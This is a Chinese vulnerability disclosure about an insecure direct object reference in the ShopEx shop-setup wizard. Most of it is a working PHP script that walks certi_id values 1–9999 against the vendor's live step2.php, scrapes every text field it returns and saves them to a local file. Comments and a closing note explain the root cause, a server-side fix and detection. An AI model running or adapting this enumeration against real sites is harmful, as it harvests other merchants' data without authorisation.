简要描述:
ShopEx 某接口缺陷，可遍历所有网站
详细说明:
问题出现在 ShopEx 网店使用向导页面：

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数 base64 解码后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站。
<?php

// Walk certificate ids 1..9999 and dump what the wizard returns for each one.
// Every iteration is one unauthenticated HTTP request to the vendor host, so the
// traffic pattern (sequential certi_id values from a single client hitting
// step2.php) is what a WAF rule or log alert on that endpoint should key on.
for ($i=1; $i < 10000; $i++) { // enumerate

ShowshopExD($i);

}
/**
 * Proof-of-concept for the ShopEx setup-wizard certi_id enumeration.
 *
 * Builds the same base64-encoded JSON `refer` value the wizard page receives,
 * with the caller-chosen certi_id substituted, requests step2.php, and prints
 * every <input type="text"> name/value pair found in the response.
 *
 * Root cause (as described in the writeup above): certi_id inside `refer` is a
 * client-supplied sequential integer that the server does not bind to the
 * requester — an insecure direct object reference. The fix is server-side:
 * resolve the certificate from the authenticated session or from a signed,
 * unguessable token instead of a client-editable JSON blob; merely re-encoding
 * the parameter does not help. Detection: bursts of step2.php requests from one
 * source whose decoded certi_id values increase sequentially.
 *
 * @param int|string $cid certificate id to request; coerced with intval()
 * @return void output goes to stdout and is appended to c:/shopEx.txt
 */
function ShowshopExD($cid) {

$url='http://guide.ecos.shopex.cn/step2.php';

// Same JSON shape as the decoded refer shown above; intval() keeps the id a bare
// integer inside the JSON. callback_url is a placeholder this script never reads.
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
$url = $url.'?refer='.$refer;

$ch = curl_init($url);
// Have curl_exec() return the body instead of echoing it.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;

// CURLOPT_BINARYTRANSFER has had no effect since PHP 5.1.3; kept as written.
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;

// NOTE(review): the return value is not checked; on a transport failure $result
// is false and the rest of the function runs on an empty string.
$result = curl_exec($ch);

// Re-encode the page from UTF-8 to GB2312 — presumably so the echo below is
// readable on a GB2312 console; the regexes below run on the converted bytes.
$result = mb_convert_encoding($result, "gb2312", "UTF-8");

// The wizard reflects the refer value into the page when the id resolved.
// Truthiness check: a match at offset 0 would be treated as "no match".
if(strpos($result,$refer))

{

// Append mode; fopen() failure is not checked, so fwrite() would receive false.
$fp = fopen("c:/shopEx.txt",'ab'); // save to file

// Capture the attribute string of each self-closed <input type="text" ... />.
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);

foreach ($value[1] as $key) {
// $res[1] holds the name attributes, $res[3] the value attributes. An input
// without a value attribute yields no match, so [0] is an undefined offset
// (notice) and the line printed is just ":".
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
echo $res[1][0].':'.$res[3][0]."\r\n";
$col =$res[1][0].':'.$res[3][0]."\r\n";

fwrite($fp, $col, strlen($col));

}

// Separator between one certificate's fields and the next.
echo '--------------------------------'."\r\n";

fclose($fp);

}

flush();

curl_close($ch);

}

?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer 换成其他加密方式。（补充：仅更换 refer 的编码或加密方式并不能阻止遍历——只要 certi_id 仍由客户端提供且服务端不校验其与当前会话的归属，可构造的合法值仍然存在；应在服务端将 certi_id 与已认证会话或签名令牌绑定，并对 step2.php 上顺序递增的 certi_id 请求做限速与告警。）